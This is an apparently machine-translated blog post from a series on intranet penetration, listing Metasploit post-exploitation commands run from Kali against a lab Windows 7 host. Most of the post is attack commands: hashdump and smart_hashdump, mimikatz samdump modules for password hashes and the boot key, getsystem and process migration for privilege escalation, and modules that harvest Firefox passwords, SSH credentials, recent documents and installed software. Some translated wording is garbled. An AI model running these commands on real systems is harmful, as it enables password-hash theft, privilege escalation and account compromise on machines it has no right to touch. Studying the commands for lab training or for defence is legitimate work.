当前位置:网站首页>Intranet information collection of Intranet penetration (3)
Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Ordinary users are entitled to
Intranet information collection of Intranet penetration ( Four )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump //system The powers of the meterpreter
set session 1
exploit // The results are stored in tmp Under the table of contents
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
User name :RID:LM-HASH value :NT-HASH value
rid yes windows The system account corresponds to a fixed value , Be similar to linux Of uid,gid Number ,500 by administartor,501 by guest etc. . and lm-hash and nt-hash, They all encrypt user passwords , But the encryption method is different
hashdump It uses mimikatz Part of the function of
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Ordinary users are entitled to
getuid
View user permissions
hashdump
Need administrator's permission
getsystem
It's just that on the surface, it has obtained administrator permission , Do not have some real administrator privileges
ps
Check the process
getpid
View the current process
migrate
Process migration ( Migrate ordinary user processes to administrator user processes )
hashdump
08other
Determine whether the target host is a virtual machine :
run checkvm
Get the software installation information on the target host :
run post/windows/gather/enum_applications
Get the most recently accessed documents on the target host 、 Link information :
run post/windows/gather/dumplinks
View the target environment information :
run post/windows/gather/env
see firefox Account and password stored in :
run post/windows/gather/firefox_creds
see ssh Ciphertext information of account password 、 Certificate information :
run post/windows/gather/ssh_creds
边栏推荐
- Middleware vulnerability recurrence Apache
- The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
- SQL注入
- Realize applet payment function with applet cloud development (including source code)
- Record an API interface SQL injection practice
- JDBC read this article is enough
- Record once, modify password logic vulnerability actual combat
- Captcha killer verification code identification plug-in
- Solutions to common problems in database development such as MySQL
- Network technology related topics
猜你喜欢
Low income from doing we media? 90% of people make mistakes in these three points
Intranet information collection of Intranet penetration (5)
Markdown font color editing teaching
《统计学》第八版贾俊平第九章分类数据分析知识点总结及课后习题答案
Apache APIs IX has the risk of rewriting the x-real-ip header (cve-2022-24112)
HackMyvm靶机系列(2)-warrior
Proceedingjoinpoint API use
List and data frame of R language experiment III
DVWA (5th week)
《統計學》第八版賈俊平第七章知識點總結及課後習題答案
随机推荐
MySQL interview questions (4)
HackMyvm靶机系列(2)-warrior
xray与burp联动 挖掘
Renforcer les dossiers de base de l'apprentissage
Applet Web Capture -fiddler
7-5 staircase upgrade (PTA program design)
HackMyvm靶机系列(4)-vulny
The difference between layer 3 switch and router
Detailed explanation of three ways of HTTP caching
xray與burp聯動 挖掘
Realize applet payment function with applet cloud development (including source code)
内网渗透之内网信息收集(五)
7-7 7003 combination lock (PTA program design)
《统计学》第八版贾俊平第十四章指数知识点总结及课后习题答案
HackMyvm靶机系列(6)-videoclub
Xray and burp linkage mining
Circular queue (C language)
Ucos-iii learning records (11) - task management
. Net6: develop modern 3D industrial software based on WPF (2)
How to test whether an object is a proxy- How to test if an object is a Proxy?